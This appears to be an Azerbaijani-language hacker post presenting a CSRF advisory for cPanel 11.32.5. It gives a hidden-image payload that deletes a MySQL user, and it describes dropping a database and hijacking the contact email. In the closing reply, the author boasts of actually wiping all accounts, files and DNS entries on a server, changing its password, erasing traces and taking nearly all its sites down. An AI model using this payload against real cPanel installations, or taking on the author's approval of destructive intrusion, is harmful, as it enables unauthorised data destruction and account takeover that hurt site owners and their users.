Kimki cpanelin bu versiyasından istifadə edirsə ehtiyyatlı olsun.Cpanelə login olmuşkən heç bir sayta daxil olmasın.
Əks halda owned olmaq qaçılmazdır.
Nələr etmək olduğunu aşağıdakı advisoryimdə göstərmişəm.
==============================================================================
Vulnerable Software: cPanel version : 11.32.5 (build 11)-11.32.5.11 [ cPanel Pro ]
Vulnerability: CSRF
Vendor: cpanel.net
==============================================================================
=====================================================================
Tested version: Your current cPanel version : 11.32.5 (build 11)-11.32.5.11 [ cPanel Pro ]
Aka: Cpanel Accelerated 2
via
WHM 11.32.5 (build 11)
Here we are going to drop database named: armenian_music
=====================================================================
CSRF: Drop mysql user: (Method $_GET)
<img src="http://************.net:2082/frontend/x3/sql/deluser.html?user=armenian_adserve" heigth="0" width="0" />
Here we are going to drop mysql user named: armenian_adserver ))
=====================================================================
CSRF: Change email address: (Contact Information & Preferences) (Method $_GET)
Changing email address to: owned_and_owned_again@gmail.tld
SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
osvdb.com
websecurity.com.ua
to all Aa Team + to all Azerbaijan Black HatZ +
*Especially to my bro CAMOUFL4G3 *
Also special thanks to: ottoman38 & HERO_AZE
================================================
@TheConficker hə bro inanki beyin o qədər çönmüşdü istəyirdim WHM-də ssh-i aktiv edim girim mələdim yerli dibli oraları başladım cpaneli qurdalamağa tapdıqlarım bunlar oldu.
SSH-ə amma heç ehtiyyac olmadı aktiv etməyə (edə bilməyəcəkdim disable edilmişdi yerli dibli) bütün akkauntları fayllarını DNS entryləri zadı uçurtdum passı də dəyişdim + izləri də pozdum cırdım aradan)))))))
Saytların 99.99% downdadır hal hazırda)))
Frozen
xahiş olunur bir qədər diqqətlə oxu advisory-ni başa düşəcəksən 1-dəfə yazdığımı inanki həvəs nə də vaxt nə də səbr yoxdur yenidən başa salmağa ya yazmağa.
Bu CSRF -vulndur.
Yəniki yuxarıda göstərdiyim əməliyyatları eetməklə (xüsusilə victimin kontekstində həmin nəticələrə gətirib çıxara bilərsən)
ftp akkaunt əlavə etməkdən tutmuş (sakit şəkildə ) database-in drop edilməsinə qədər.